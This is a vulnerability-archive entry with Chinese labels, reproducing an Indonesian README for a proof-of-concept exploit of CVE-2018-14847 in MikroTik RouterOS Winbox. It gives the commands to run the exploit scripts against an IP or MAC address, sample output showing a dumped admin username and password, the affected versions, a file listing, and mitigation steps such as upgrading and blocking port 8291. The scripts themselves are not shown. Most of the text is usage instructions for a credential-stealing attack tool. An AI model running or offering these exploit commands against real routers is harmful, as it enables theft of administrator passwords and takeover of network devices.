来源

关联漏洞

描述

PoC of CVE-2018-14847 Mikrotik Vulnerability using simple script

介绍

# Mikrotik Login Exploit
PoC (Proof of Concept) dari vulnerability mikrotik CVE-2018-14847 (terutama pada winbox), memiliki cara kerja membaca password langsung dari RouterOS pada port default 8291.

Original by: https://github.com/BigNerd95/

## Requirements
- Python 3+

### Instalasi pada Linux
```
apt install python3
```


## Contoh Penggunaan

#### WinBox (TCP/IP)
```
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
```
e.g:
```
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123
```

#### Menggunakan MAC Address  
Anda bisa menggunakan script ini walau tanpa IP address.

Gunakan MACServerDiscovery.py untuk scan router.
```
python3 MACServerDiscover.py
```
e.g:
```
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa
```

Exploitasi:
```
python3 MACServerExploit.py <MAC-ADDRESS>
```
e.g:
```
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: oppaidaisuki123
```

## Vulnerable Versions
RouterOS keluaran 2015-05-28 s/d 2018-04-20

RouterOS versions:

- Longterm: 6.30.1 - 6.40.7
- Stable: 6.29 - 6.42
- Beta: 6.29rc1 - 6.43rc3

Info selengkapnya : https://blog.mikrotik.com/security/winbox-vulnerability.html

## Pencegahan Exploit
- Upgrade RouterOS ke 6.42+
- Nonaktifkan Winbox
- Blok service:
```
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
```
- Filter Rules (ACL), blok port 8291:
```
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
```
- Batasi akses login winbox dari MAC Adress:
```
/tool mac-server mac-winbox
```

文件快照

 [4.0K]  /data/pocs/97c98a9b8fdca3b85a96dbb79df70359436bc9f8
├── [1.5K]  extract_user.py
├── [ 991]  MACServerDiscover.py
├── [5.1K]  MACServerExploit.py
├── [1.6K]  README.md
└── [2.2K]  WinboxExploit.py

0 directories, 5 files

备注